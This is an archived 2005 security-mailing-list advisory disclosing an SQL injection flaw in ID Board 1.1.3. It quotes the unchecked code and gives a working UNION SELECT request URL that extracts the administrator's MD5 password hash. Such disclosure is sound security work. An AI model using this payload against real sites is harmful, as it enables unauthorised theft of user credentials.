| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun Jul 10 10:47:34 2005
From: defa at systemli.org (Defa)
Subject: ID Board 1.1.3 SQL Injection Vulnerability
============================================================
Title: ID Board 1.1.3 SQL Injection Vulnerability
Vulnerability Discovery: me, myself and I
Date: 09/07/2005
Severity: Remote users can fetch MD5 Passwd Hash.
Affected version: 1.1.3 free (only one tested)
Vendor: http://www.id-team.com/
============================================================
============================================================
* Summary *
ID Board is a little Bulletin Board system. It is offered in three
versions, I could only test the free one. Board is commonly used on
german speaking websites.
-------------------------------------------------------------
* Problem Description *
-----------------------
The bug reside in sql.cls.php - the tbl_suff variable isn't checked.
Vulnerable Code:
if (!ereg("LEFT JOIN", $from) && !ereg(",", $from) &&
!ereg("AS", $from))
$from = "[tbl_prev]".$from."[tbl_suff]";
* Example * (Account required)
------------------------------
http://support.id-team.com/index.php?site=warn&f=1%20WHERE%200=1%
20UNION%20SELECT%20mem_pw%20as%20post_topic_name%20FROM%20members%
20WHERE%20mem_id=1/*&0&warn=0
-------------------------------------------------------------
* Fix *
Contact the Vendor.
-------------------------------------------------------------
* References *
This mail.
-------------------------------------------------------------
* Credits *
no credit.
-------------------------------------------------------------
regards
defa
--
Don't eat yellow snow!
Powered by blists - more mailing lists